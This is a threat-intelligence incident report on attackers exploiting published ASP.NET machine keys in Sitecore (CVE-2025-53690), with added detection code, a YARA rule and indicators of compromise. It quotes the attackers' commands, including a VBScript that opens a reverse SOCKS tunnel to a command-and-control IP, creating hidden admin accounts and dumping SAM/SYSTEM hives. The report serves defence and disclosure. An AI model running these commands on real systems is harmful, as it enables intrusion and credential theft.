Cloud Blog: ViewState Deserialization Zero-Day Vulnerability in Sitecore Products (CVE-2025-53690)

Source URL: https://cloud.google.com/blog/topics/threat-intelligence/viewstate-deserialization-zero-day-vulnerability/
Source: Cloud Blog
Title: ViewState Deserialization Zero-Day Vulnerability in Sitecore Products (CVE-2025-53690)

Feedly Summary: Written by: Rommel Joven, Josh Fleischer, Joseph Sciuto, Andi Slok, Choon Kiat Ng

In a recent investigation, Mandiant Threat Defense discovered an active ViewState deserialization attack affecting Sitecore deployments leveraging sample machine keys that had been exposed in Sitecore deployment guides from 2017 and earlier. An attacker leveraged the exposed ASP.NET machine keys to perform remote code execution.
Mandiant worked directly with Sitecore to address this issue. Sitecore tracks this vulnerable configuration as CVE-2025-53690, which affects customers who deployed any version of multiple Sitecore products using sample keys exposed in publicly available deployment guides (specifically Sitecore XP 9.0 and Active Directory 1.4 and earlier versions). Sitecore has confirmed that its updated deployments automatically generate unique machine keys and that affected customers have been notified.
Refer to Sitecore’s advisory for more information on which products are potentially impacted. 
Summary
Mandiant successfully disrupted the attack shortly after initiating rapid response, which ultimately prevented us from observing the full attack lifecycle. However, our investigation still provided insights into the adversary’s activity. The attacker’s deep understanding of the compromised product and the exploited vulnerability was evident in their progression from initial server compromise to privilege escalation. Key events in this attack chain included:

- Initial compromise was achieved by exploiting the ViewState deserialization vulnerability CVE-2025-53690 on the affected internet-facing Sitecore instance, resulting in remote code execution.
- A decrypted ViewState payload contained WEEPSTEEL, a malware designed for internal reconnaissance.
- Leveraging this access, the threat actor archived the root directory of the web application, indicating an intent to obtain sensitive files such as web.config. This was followed by host and network reconnaissance.
- The threat actor staged tooling in a public directory, which included:
  - Open-source network tunnel tool, EARTHWORM
  - Open-source remote access tool, DWAGENT
  - Open-source Active Directory (AD) reconnaissance tool, SHARPHOUND
- Local administrator accounts were created and used to dump the SAM/SYSTEM hives in an attempt to compromise cached administrator credentials. The compromised credentials then enabled lateral movement via RDP.
- DWAgent provided persistent remote access and was used for Active Directory reconnaissance.

Figure 1: Attack lifecycle

Initial Compromise
External Reconnaissance
The threat actor began their operation by probing the victim’s web server with HTTP requests to various endpoints before ultimately shifting their attention to the /sitecore/blocked.aspx page. This page is a legitimate Sitecore component that simply returns a message if a request was blocked due to licensing issues. The page’s use of a hidden ViewState form (a standard ASP.NET feature), combined with being accessible without authentication, made it a potential target for ViewState deserialization attacks.
ViewState Deserialization Attack
ViewStates are an ASP.NET feature designed to persist the state of webpages by storing it in a hidden HTML field named __VIEWSTATE. ViewState deserialization attacks exploit the server’s willingness to deserialize ViewState messages when validation mechanisms are either absent or circumvented. When machine keys (which protect ViewState integrity and confidentiality) are compromised, the application effectively loses its ability to differentiate between legitimate and malicious ViewState payloads sent to the server.
Local web server (IIS) logs recorded that the threat actor’s attack began by sending an HTTP POST request to the blocked.aspx endpoint, which was met with an HTTP 302 "Found" response. This web request coincided with a "ViewState verification failed" message in Windows application event logs (Event ID 1316) containing the crafted ViewState payload sent by the threat actor:

```
Log: Application
Source: ASP.NET 4.0.30319.0
EID: 1316
Type: Information

Event code: 4009-++-Viewstate verification failed. Reason: Viewstate was
invalid.

ViewStateException information:
Exception message: Invalid viewstate.
Client IP: <redacted>
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1;
Trident/5.0) chromeframe/10.0.648.205 Mozilla/5.0
(Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko)
Chrome/121.0.0.0 Safari/537.36
PersistedState: <27760 byte encrypted + base64 encoded payload>
Referer:
Path: /sitecore/blocked.aspx
```
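As an added example (not code from the report or from Sitecore), the following Python parses the body of a 1316 event in the layout shown above and correlates it with W3C-format IIS log lines to surface the pattern Mandiant describes: a client whose ViewState fails verification on a page and who then receives HTTP 200 on further POSTs to that same page. The event text, the IIS lines, the RFC 5737 addresses and the filler PersistedState value are all constructed.

```python
"""Triage helper for ASP.NET Event ID 1316 ("Viewstate verification failed").
Added example (not from the Mandiant write-up): parse the event body, then
correlate with W3C IIS log lines. All sample data below is constructed."""
import re
from collections import defaultdict

# Constructed stand-in for the encrypted + base64 PersistedState (64 chars).
FAKE_VIEWSTATE = "/wEPDwUKLTcyODc4" + "QUFB" * 12

# Constructed 1316 event body in the layout the Application log uses.
EVENT_1316 = f"""Event code: 4009
Event message: Viewstate verification failed. Reason: Viewstate was
invalid.
Exception message: Invalid viewstate.
Client IP: 203.0.113.7
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
PersistedState: {FAKE_VIEWSTATE}
Referer:
Path: /sitecore/blocked.aspx
"""

# Constructed W3C IIS log: one benign GET, then the 302 + 200 POST sequence.
IIS_LOG = """#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken
2025-06-01 10:00:01 10.0.0.5 GET /sitecore/blocked.aspx - 443 - 198.51.100.9 Mozilla/5.0 - 200 0 0 31
2025-06-01 10:00:12 10.0.0.5 POST /sitecore/blocked.aspx - 443 - 203.0.113.7 Mozilla/5.0 - 302 0 0 140
2025-06-01 10:00:45 10.0.0.5 POST /sitecore/blocked.aspx - 443 - 203.0.113.7 Mozilla/5.0 - 200 0 0 98
2025-06-01 10:01:10 10.0.0.5 POST /sitecore/blocked.aspx - 443 - 203.0.113.7 Mozilla/5.0 - 200 0 0 102
"""

KEY_LINE = re.compile(r"^([A-Za-z][A-Za-z -]*):\s*(.*)$")

def parse_event_1316(body: str) -> dict:
    """Extract responder-relevant fields; lines without a key are wrapped
    continuations of the previous value (the User-Agent wraps this way)."""
    fields, key = {}, None
    for line in (raw.strip() for raw in body.splitlines()):
        m = KEY_LINE.match(line)
        if m:
            key = m.group(1)
            fields[key] = m.group(2)
        elif key and line:
            fields[key] += " " + line
    return {
        "client_ip": fields.get("Client IP", ""),
        "path": fields.get("Path", ""),
        "user_agent": fields.get("User-Agent", ""),
        # Size of the base64 text: a large ViewState posted to an
        # unauthenticated page such as blocked.aspx is the first thing to check.
        "payload_bytes": len(fields.get("PersistedState", "")),
    }

def parse_iis(text: str):
    """Yield one dict per W3C record, naming columns from the #Fields header."""
    fields = []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#") and fields:
            yield dict(zip(fields, line.split()))

def correlate(event_bodies, iis_text) -> dict:
    """For each (client ip, path) that failed verification, count the statuses
    of that client's POSTs; keep only clients that also received a 200.
    Ordering within the log is not enforced in this simplified version."""
    failed = {(e["client_ip"], e["path"]) for e in map(parse_event_1316, event_bodies)}
    hits = defaultdict(lambda: defaultdict(int))
    for rec in parse_iis(iis_text):
        key = (rec.get("c-ip"), rec.get("cs-uri-stem"))
        if key in failed and rec.get("cs-method") == "POST":
            hits[key][rec.get("sc-status")] += 1
    return {k: dict(v) for k, v in hits.items() if v.get("200", 0) > 0}
```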
Mandiant recovered a copy of the server’s machine keys, which were stored in the ASP.NET configuration file web.config. Like many other ViewState deserialization attacks, this particular Sitecore instance used compromised machine keys. Knowledge of these keys enabled the threat actor to craft malicious ViewStates that were accepted by the server by using tools like the public ysoserial.net project. 
Initial Host Reconnaissance
Mandiant decrypted the threat actor’s ViewState payload using the server’s machine keys and found it contained an embedded .NET assembly named Information.dll. This assembly, which Mandiant tracks as WEEPSTEEL, functions as an internal reconnaissance tool and has similarities to the GhostContainer backdoor and an information-gathering payload previously observed in the wild.

About WEEPSTEEL
WEEPSTEEL is a reconnaissance tool designed to gather system, network, and user information. This data is then encrypted and exfiltrated to the attacker by disguising it as a benign __VIEWSTATE response.

The payload is designed to exfiltrate the following system information for reconnaissance:

```csharp
// Code snippet from the host reconnaissance function
Information.BasicsInfo basicsInfo = new Information.BasicsInfo
{
    Directories = new Information.Directories
    {
        CurrentWebDirectory = HostingEnvironment.MapPath("~/")
    },
    // Gather system information
    OperatingSystemInformation = Information.GetOperatingSystemInformation(),
    DiskInformation = Information.GetDiskInformation(),
    NetworkAdapterInformation = Information.GetNetworkAdapterInformation(),
    Process = Information.GetProcessInformation()
};
// Serialize the 'basicsInfo' object into a JSON string
JavaScriptSerializer javaScriptSerializer = new JavaScriptSerializer();
text = javaScriptSerializer.Serialize(basicsInfo);
```

Code snippet illustrating WEEPSTEEL malware collection functionality
WEEPSTEEL appears to borrow some functionality from ExchangeCmdPy.py, a public tool tailored for similar ViewState-related intrusions. This comparison was originally noted in Kaspersky’s write-up on the GhostContainer backdoor. Like ExchangeCmdPy, WEEPSTEEL sends its output through a hidden HTML field masquerading as a legitimate __VIEWSTATE parameter, shown as follows:
```html
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE"
value="/wEPDwUKLTcyODc4{AES encrypted + base64 encoded output}" />
```
Subsequent HTTP POST requests to the blocked.aspx endpoint from the threat actor would result in HTTP 200 "OK" responses, which Mandiant assesses would have contained an output in the aforementioned format. As the threat actor continued their hands-on interaction with the server, Mandiant observed repeated HTTP POST requests with successful responses to the blocked.aspx endpoint.
Establish Foothold
Following successful exploitation, the threat actor obtained code execution as NETWORK SERVICE, the account under which the IIS worker process (w3wp.exe) runs. This access provided the actor a starting point for further malicious activities.
Config Extraction
The threat actor then exfiltrated critical configuration files by archiving the contents of \inetpub\sitecore\SitecoreCD\Website, a Sitecore Content Delivery (CD) instance’s web root. This directory contained sensitive files, such as the web.config file, that provide sensitive information about the application’s backend and its dependencies, which would help enable post-exploitation activities.
Host Reconnaissance
After obtaining the key server configuration files, the threat actor proceeded to fingerprint the compromised server through host and network reconnaissance, including but not limited to enumerating running processes, services, user accounts, TCP/IP configurations, and active network connections.
```
whoami
hostname
net user
tasklist
ipconfig /all
tasklist /svc
netstat -ano
nslookup <domain>
net group domain admins
net localgroup administrators
```
Staging Directory 
The threat actor leveraged public directories such as Music and Video for staging and deploying their tooling. Files written into the Public directory include:

- File: C:\Users\Public\Music\7za.exe
  Description: command-line executable for the 7-Zip file archiver
  SHA-256: 223b873c50380fe9a39f1a22b6abf8d46db506e1c08d08312902f6f3cd1f7ac3

- File: C:\Users\Public\Music\lfe.ico
  Description: an open-source network tunnel tool with SOCKS v5 server, tracked as EARTHWORM
  SHA-256: b3f83721f24f7ee5eb19f24747b7668ff96da7dfd9be947e6e24a688ecc0a52b

About EARTHWORM
EARTHWORM is an open-source tunneler that allows attackers to create a covert channel to and from a victim system over a separate protocol to avoid detection and network filtering, or to enable access to otherwise unreachable systems.
During our investigation, EARTHWORM was executed to initiate a reverse SOCKS proxy connection back to the following command-and-control (C2) servers:

- 130.33.156[.]194:443
- 103.235.46[.]102:80

- File: C:\Users\Public\Music\1.vbs
  Description: attacker VBScript used to execute threat actor commands; its content varies based on the desired actions.
  SHA-256: <hash varies>

In one instance where the file 1.vbs was retrieved, it contained simple VBScript to launch EARTHWORM:

```vbscript
Set shell = CreateObject("WScript.Shell")
shell.CurrentDirectory = "C:\Users\Public\Music"
shell.Run "ufp.exe -s rssocks -d 130.33.156[.]194 -e 443", 1, False
```

Escalate Privileges
Following initial compromise, the threat actor elevated their access from NETWORK SERVICE privileges to the SYSTEM or ADMINISTRATOR level.
This involved creating local administrator accounts and obtaining access to domain administrator accounts. The threat actor was observed using additional tools to escalate privileges.
Adding Local Administrators

asp$: The threat actor leveraged a privilege escalation tool to create the local administrator account asp$. The naming convention, which mimics an ASP.NET service account with the common suffix $, suggests an attempt to blend in and evade detection.

```
"C:\Users\Public\Music\helper.exe" "net user asp$ {REDACTED} /add"
"C:\Users\Public\Music\helper.exe" "net localgroup administrators asp$ /add"
```

sawadmin: At a later stage, the threat actor established a DWAGENT remote session to create a second local administrator account.

```
net user sawadmin {REDACTED} /add
net localgroup administrators sawadmin /add
```
Credential Dumping
The threat actor established RDP access to the host using the two newly created accounts and proceeded to dump the SYSTEM and SAM registry hives from both accounts. While redundant, this gave the attacker the information necessary to extract password hashes of local user accounts on the system. The activities associated with each account are as follows:

asp$:

```
reg save HKLM\SYSTEM c:\users\public\system.hive
reg save HKLM\SAM c:\users\public\sam.hive
```

sawadmin: Prior to dumping the registry hives, the threat actor executed GoToken.exe. Unfortunately, the binary was not available for analysis.

```
GoToken.exe -h
GoToken.exe -l
GoToken.exe -ah
GoToken.exe -t
reg save HKLM\SYSTEM SYSTEM.hiv
reg save HKLM\SAM SAM.hiv
```
Maintain Presence
The threat actor maintained persistence through a combination of methods, leveraging both created and compromised administrator credentials for RDP access. Additionally, the threat actor issued commands to maintain long-term access to accounts. This included modifying settings to disable password expiration for administrative accounts of interest:
```
net user <AdminUser> /passwordchg:no /expires:never
wmic useraccount where name='<AdminUser>' set PasswordExpires=False
```

For redundancy and continued remote access, the DWAGENT tool was also installed.
Remote Desktop Protocol 
The actor used the Remote Desktop Protocol extensively. The traffic was routed through a reverse SOCKS proxy created by EARTHWORM to bypass security controls and obscure their activities. In one RDP session, the threat actor under the context of the account asp$ downloaded additional attacker tooling, dwagent.exe and main.exe, into C:\Users\asp$\Downloads.

| File Path | MD5 | Description |
|---|---|---|
| C:\Users\asp$\Downloads\dwagent.exe | n/a | DWAgent installer |
| C:\Users\asp$\Downloads\main.exe | be7e2c6a9a4654b51a16f8b10a2be175 | Downloaded from hxxp://130.33.156[.]194/main.exe |

Table 1: Files written in the RDP session
Remote Access Tool: DWAGENT
DWAGENT is a legitimate remote access tool that enables remote control over the host. DWAGENT operates as a service with SYSTEM privileges and starts automatically, providing elevated, persistent access. During the DWAGENT remote session, the attacker wrote the file GoToken.exe. The commands executed suggest that the tool was used to aid in extracting the registry hives.

| File Path | MD5 | Description |
|---|---|---|
| C:\Users\Public\Music\GoToken.exe | 62483e732553c8ba051b792949f3c6d0 | Binary executed prior to dumping of SAM/SYSTEM hives. |

Table 2: File written in the DWAgent remote session

Internal Reconnaissance
Active Directory Reconnaissance
During a DWAGENT remote session, the threat actor executed commands to identify Domain Controllers within the target network. The actor then accessed the SYSVOL share on these identified DCs to search for cpassword within Group Policy Object (GPO) XML files. This is a well-known technique attackers employ to discover privileged credentials mistakenly stored in a weakly encrypted format within the domain.
```
nltest /DCLIST:<domain>
nslookup <domain-controller>
findstr /S /l cpassword \\<domain-controller>\sysvol\dcext.local\policies\*.xml
```
SHARPHOUND
The threat actor then transitioned to a new RDP session using a legitimate administrator account. From this session, SHARPHOUND, the data collection component for the Active Directory security analysis platform BLOODHOUND, was downloaded via a browser and saved to C:\Users\Public\Music\sh.exe.
Following the download, the threat actor returned to the DWAGENT remote session and executed sh.exe, performing extensive Active Directory reconnaissance.
```
sh.exe -c all
```
Once the reconnaissance concluded, the threat actor switched back to the RDP session (still using the compromised administrator account) to archive the SharpHound output, preparing it for exfiltration.
```
C:\Program Files\7-Zip\7zFM.exe "C:\Users\Public\Music\<number>_BloodHound.zip"
```
Accounts Cleanup
With administrator accounts compromised, the earlier created asp$ and sawadmin accounts were removed, signaling a shift to more stable and covert access methods. 
Move Laterally
The compromised administrator accounts were used to RDP to other hosts. On these systems, the threat actor executed commands to continue their reconnaissance and deploy EARTHWORM. 
On one host, the threat actor logged in via RDP using a compromised admin account. Under the context of this account, the threat actor then continued to perform internal reconnaissance commands such as:
```
quser
whoami
net user <AdminUser> /domain
nltest /DCLIST:<domain>
nslookup <domain-controller>
```
Recommendations
Mandiant recommends implementing security best practices in ASP.NET including implementing automated machine key rotation, enabling View State Message Authentication Code (MAC), and encrypting any plaintext secrets within the web.config file. For more details, refer to the following resources:

- ASP.NET Core security topics
- What not to do in ASP.NET, and what to do instead
- Improved ASP.NET view state security and key management
- Code injection attacks using publicly disclosed ASP.NET machine keys

For detailed Sitecore remediation instructions, refer to the official Sitecore advisory SC2025-005.
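An added example (not code from the report, Sitecore or Microsoft) that turns the ASP.NET recommendations above into a static check of web.config: static keys that match publicly documented samples, legacy validation or decryption algorithms, a disabled ViewState MAC and an unencrypted machineKey section are each reported with a severity. The KNOWN_PUBLISHED_KEYS set is a placeholder to be filled with key material known from public documentation (the deployment-guide keys are not reproduced here), and both web.config fragments are constructed.

```python
"""Audit the <machineKey> and <pages> settings in an ASP.NET web.config.
Added example, not code from the report, Sitecore or Microsoft. The set of
published keys is a placeholder and both web.config fragments are constructed."""
import xml.etree.ElementTree as ET

# Placeholder: fill with key material known to appear in public documentation.
KNOWN_PUBLISHED_KEYS = {
    "PLACEHOLDER_PUBLISHED_VALIDATION_KEY",
    "PLACEHOLDER_PUBLISHED_DECRYPTION_KEY",
}
WEAK_VALIDATION = {"MD5", "SHA1", "3DES", "AES"}   # HMACSHA256 or stronger preferred
WEAK_DECRYPTION = {"DES", "3DES"}

def audit_web_config(xml_text: str) -> list:
    """Return (severity, message) findings for the machineKey / pages settings."""
    root = ET.fromstring(xml_text)
    mk = root.find("./system.web/machineKey")
    pages = root.find("./system.web/pages")
    findings = []
    if mk is None:
        findings.append(("info", "no <machineKey>: ASP.NET auto-generates keys per server"))
    elif mk.get("configProtectionProvider"):
        # Section protected with aspnet_regiis -pe; key values are not readable here.
        findings.append(("info", "machineKey section is encrypted at rest; values not inspected"))
    else:
        for attr in ("validationKey", "decryptionKey"):
            value = mk.get(attr, "AutoGenerate")
            if value.startswith("AutoGenerate"):
                continue
            if value in KNOWN_PUBLISHED_KEYS:
                findings.append(("high", f"{attr} matches a publicly documented sample key"))
            else:
                findings.append(("medium", f"{attr} is static plaintext; confirm it is unique and rotated"))
        if mk.get("validation", "HMACSHA256").upper() in WEAK_VALIDATION:
            findings.append(("medium", f"validation={mk.get('validation')}: use HMACSHA256 or stronger"))
        if mk.get("decryption", "Auto").upper() in WEAK_DECRYPTION:
            findings.append(("medium", f"decryption={mk.get('decryption')}: use AES"))
    if pages is not None:
        if pages.get("enableViewStateMac", "true").lower() == "false":
            findings.append(("high", "enableViewStateMac=false: ViewState integrity check disabled"))
        if pages.get("viewStateEncryptionMode", "Auto") != "Always":
            findings.append(("low", "viewStateEncryptionMode is not Always"))
    return findings

# Constructed: static documented keys, legacy algorithms, MAC disabled.
WEAK_WEB_CONFIG = """<configuration>
  <system.web>
    <machineKey validationKey="PLACEHOLDER_PUBLISHED_VALIDATION_KEY"
                decryptionKey="PLACEHOLDER_PUBLISHED_DECRYPTION_KEY"
                validation="SHA1" decryption="3DES" />
    <pages enableViewStateMac="false" viewStateEncryptionMode="Auto" />
  </system.web>
</configuration>"""

# Constructed: section encrypted with aspnet_regiis, MAC on, encryption Always.
HARDENED_WEB_CONFIG = """<configuration>
  <system.web>
    <machineKey configProtectionProvider="RsaProtectedConfigurationProvider">
      <EncryptedData><!-- ciphertext omitted in this constructed sample --></EncryptedData>
    </machineKey>
    <pages enableViewStateMac="true" viewStateEncryptionMode="Always" />
  </system.web>
</configuration>"""

if __name__ == "__main__":
    for name, cfg in (("weak", WEAK_WEB_CONFIG), ("hardened", HARDENED_WEB_CONFIG)):
        for severity, message in audit_web_config(cfg):
            print(f"[{name}] {severity}: {message}")
```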
Indicators of compromise
The following indicators of compromise are available in a Google Threat Intelligence (GTI) collection for registered users.
Accounts

| Accounts | Description |
|---|---|
| asp$ | Created account |
| sawadmin | Created account |
| h496883 | Workstation from the source of the RDP connection |

File-Based

| MD5 | SHA-256 | Description |
|---|---|---|
| 117305c6c8222162d7246f842c4bb014 | a566cceaf9a66332470a978a234a8a8e2bbdd4d6aa43c2c75c25a80b3b744307 | WEEPSTEEL (Information.dll) |
| a39696e95a34a017be1435db7ff139d5 | b3f83721f24f7ee5eb19f24747b7668ff96da7dfd9be947e6e24a688ecc0a52b | EARTHWORM (lfe.ico, ufp.exe, ufp.ico) |
| f410d88429b93786b224e489c960bf5c | n/a | Helper.ico, helper.exe |
| <hash varies> | <hash varies> | 1.vbs |
| be7e2c6a9a4654b51a16f8b10a2be175 | n/a | main.exe |
| 62483e732553c8ba051b792949f3c6d0 | n/a | GoToken.exe |
| 63d22ae0568b760b5e3aabb915313e44 | 61f897ed69646e0509f6802fb2d7c5e88c3e3b93c4ca86942e24d203aa878863 | SharpHound |

Network-Based

| IP |
|---|
| 130.33.156[.]194:443 |
| 130.33.156[.]194:8080 |
| 103.235.46[.]102:80 |

Detections
Google Security Operations Enterprise and Enterprise+ customers can leverage the following product threat detections and content updates to help identify and remediate threats. All detections have been automatically delivered to Google Security Operations tenants within the Mandiant Frontline Threats curated detections ruleset. To leverage these updated rules, access Content Hub and search on any of the rule names listed below, then View and Manage each rule you wish to implement or modify.

- Earthworm Tunneling Indicators
- User Account Created By Web Server Process
- Cmd Launching Process From Users Music
- Sharphound Recon
- User Created With No Password Expiration Execution
- Discovery of Privileged Permission Groups by Web Server Process
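The behaviours these rule names describe can be approximated as simple process-creation predicates, which is what the Python below does as an added example. It is not the Google Security Operations rules themselves or code from the report; the Sysmon-style events (Image, ParentImage, CommandLine, optional Ancestors) and the 203.0.113.10 address are constructed.

```python
"""Process-creation triage for the behaviours described in this report.
Added example, not the Google Security Operations rules named above and not
code from the report; the sample events (Sysmon-style Image / ParentImage /
CommandLine fields) and the 203.0.113.10 address are constructed."""
import re

STAGING_DIR = re.compile(r"^c:\\users\\public\\(music|videos?|pictures)\\", re.I)
WEB_WORKER = re.compile(r"\\w3wp\.exe$", re.I)
ACCOUNT_ADD = re.compile(r"\bnet1?(\.exe)?\s+user\s+\S+\s+\S+\s+/add\b", re.I)
ADMIN_GROUP_ADD = re.compile(r"\bnet1?(\.exe)?\s+localgroup\s+administrators\s+\S+\s+/add\b", re.I)
PRIV_GROUP_ENUM = re.compile(r'\bnet1?(\.exe)?\s+(group\s+"?domain admins"?|localgroup\s+administrators)\s*$', re.I)
NO_EXPIRY = re.compile(r"/expires:never|/passwordchg:no|PasswordExpires\s*=\s*False", re.I)
HIVE_SAVE = re.compile(r"\breg(\.exe)?\s+save\s+HKLM\\(SAM|SYSTEM)\b", re.I)
REVERSE_SOCKS = re.compile(r"-s\s+(rssocks|rcsocks|lcx_\w+)\b.*-d\s+\S+.*-e\s+\d+", re.I)

def evaluate(ev: dict) -> list:
    """Return the behaviour tags one process event matches (empty if benign)."""
    cmd = ev.get("CommandLine", "")
    image, parent = ev.get("Image", ""), ev.get("ParentImage", "")
    # "By web server process" also covers a helper that w3wp.exe launched first.
    lineage = [parent] + ev.get("Ancestors", [])
    from_web = any(WEB_WORKER.search(p) for p in lineage)
    tags = []
    if STAGING_DIR.match(image) or STAGING_DIR.match(parent):
        tags.append("process launched from Users\\Public staging directory")
    if from_web and (ACCOUNT_ADD.search(cmd) or ADMIN_GROUP_ADD.search(cmd)):
        tags.append("local account created or elevated by web server process")
    if from_web and PRIV_GROUP_ENUM.search(cmd):
        tags.append("privileged group enumeration by web server process")
    if NO_EXPIRY.search(cmd):
        tags.append("account password expiry disabled")
    if HIVE_SAVE.search(cmd):
        tags.append("SAM/SYSTEM hive export")
    if REVERSE_SOCKS.search(cmd):
        tags.append("EARTHWORM-style reverse SOCKS arguments")
    return tags

def scan(events) -> list:
    """Return (index, tags) for every event that matched at least one tag."""
    return [(i, t) for i, ev in enumerate(events) if (t := evaluate(ev))]

# Constructed events following the sequence in the report (one benign first).
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\inetsrv\w3wp.exe",
     "ParentImage": r"C:\Windows\System32\svchost.exe",
     "CommandLine": 'w3wp.exe -ap "Sitecore"'},
    {"Image": r"C:\Windows\System32\net.exe",
     "ParentImage": r"C:\Users\Public\Music\helper.exe",
     "Ancestors": [r"C:\Windows\System32\inetsrv\w3wp.exe"],
     "CommandLine": "net user asp$ <redacted> /add"},
    {"Image": r"C:\Windows\System32\net.exe",
     "ParentImage": r"C:\Windows\System32\inetsrv\w3wp.exe",
     "CommandLine": "net group domain admins"},
    {"Image": r"C:\Users\Public\Music\ufp.exe",
     "ParentImage": r"C:\Windows\System32\wscript.exe",
     "CommandLine": "ufp.exe -s rssocks -d 203.0.113.10 -e 443"},
    {"Image": r"C:\Windows\System32\reg.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"reg save HKLM\SAM c:\users\public\sam.hive"},
    {"Image": r"C:\Windows\System32\net.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "net user svc_admin /passwordchg:no /expires:never"},
]

if __name__ == "__main__":
    for index, tags in scan(SAMPLE_EVENTS):
        print(index, "->", "; ".join(tags))
```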

YARA Rule
```yara
rule G_Recon_WEEPSTEEL_1 {
    meta:
        author = "Mandiant"
    strings:
        $v_w = "<input type=\"hidden\" name=\"__VIEWSTATE\" id=\"__VIEWSTATE\" value=" wide
        $v_a = "<input type=\"hidden\" name=\"__VIEWSTATE\" id=\"__VIEWSTATE\" value="
        $v_b64_w = "<input type=\"hidden\" name=\"__VIEWSTATE\" id=\"__VIEWSTATE\" value=" base64wide
        $v_b64_a = "<input type=\"hidden\" name=\"__VIEWSTATE\" id=\"__VIEWSTATE\" value=" base64
        $s2 = "Services\\Tcpip\\Parameters" wide
        $s3 = "GetOperatingSystemInformation"
        $s4 = "GetSystemInformation"
        $s5 = "GetNetworkAdapterInformation"
        $s6 = "GetAllNetworkInterfaces"
        $s7 = "GetIPProperties"
        $s8 = "GetPhysicalAddress"
        $s9 = "GetDomainNameFromRegistry"

        $c1 = "Aes" fullword
        $c2 = "CreateEncryptor" fullword
        $c3 = "System.Security.Cryptography" fullword
        $c4 = "ToBase64String" fullword

        $guid = "6d5a95da-0ffe-4303-bb2c-39e182335a9f"
    condition:
        uint16(0) == 0x5a4d and
        (
            (all of ($c*) and 7 of ($s*)) or
            ($guid and (any of ($v*)))
        )
}
```
Acknowledgement
We would like to extend our gratitude to the Sitecore team for their support throughout this investigation. Additionally, we are grateful to Tom Bennett and Nino Isakovic for their assistance with the payload analysis. We also appreciate the valuable input and technical review provided by Richmond Liclican and Tatsuhiko Ito.


AI Summary and Description: Yes

### Summary:
This investigation by Mandiant highlights a critical vulnerability in Sitecore products stemming from exposed machine keys. The discovery of a ViewState deserialization attack illustrates the potential for serious remote code execution, reinforcing the importance of proper security practices in ASP.NET environments. This report serves as a compelling case study for security professionals, particularly regarding the mitigation of similar vulnerabilities and the necessity of proactive defenses in application security.

### Detailed Description:
**Mandiant’s Investigation of Sitecore Vulnerability**

– **Attack Type**: The investigation identified an ongoing ViewState deserialization attack targeting Sitecore deployments, taking advantage of sample machine keys that were made available in outdated deployment guides.

– **Exploited Vulnerability**: Attackers achieved remote code execution by using the compromised ASP.NET machine keys to forge ViewState payloads. The vulnerability is tracked as CVE-2025-53690, affecting various versions of Sitecore products.

– **Attack Sequence**:
  – Initial access was gained through the exploitation of the vulnerability on an internet-facing Sitecore instance.
  – The payload contained malware (WEEPSTEEL) for reconnaissance, indicating the sophistication of the attacker.
  – Following the initial access, the attacker demonstrated clear intentions to gather sensitive data through methods including:
    – Archiving critical configuration files.
    – Performing local and network reconnaissance to identify vulnerabilities in the host system.

– **Utilization of Tools**:
  – Malicious tools uploaded included EARTHWORM (for tunneling) and DWAGENT (for remote access).
  – The attacker created local administrator accounts for persistence and lateral movement.

– **Privilege Escalation Techniques**:
  – The escalation from NETWORK SERVICE to administrator privileges involved creating accounts and accessing other crucial parts of the network.
  – The threat actor executed code to gather sensitive registry information (e.g., dumping SYSTEM and SAM hives).

– **Recommendations for Mitigation**:
  – Implementing security best practices in ASP.NET, including:
    – Automated machine key rotation.
    – Enabling View State Message Authentication Code (MAC).
    – Encrypting sensitive data within configuration files.

– **Indicators of Compromise**:
  – Specific accounts and file hashes associated with the malware and tools used during the attack were documented as indicators for detection in environments potentially affected.

– **Detections and Recommendations**:
  – Mandiant also provided new detection rules and tools to enhance monitoring and response capabilities against similar attacks in the future.

This case serves as a cautionary tale for developers and security professionals, underscoring the critical importance of securing application configurations and implementing robust security controls to guard against data breaches and operational disruptions. Such vulnerabilities must be managed proactively to mitigate risks associated with exposure to unauthorized access.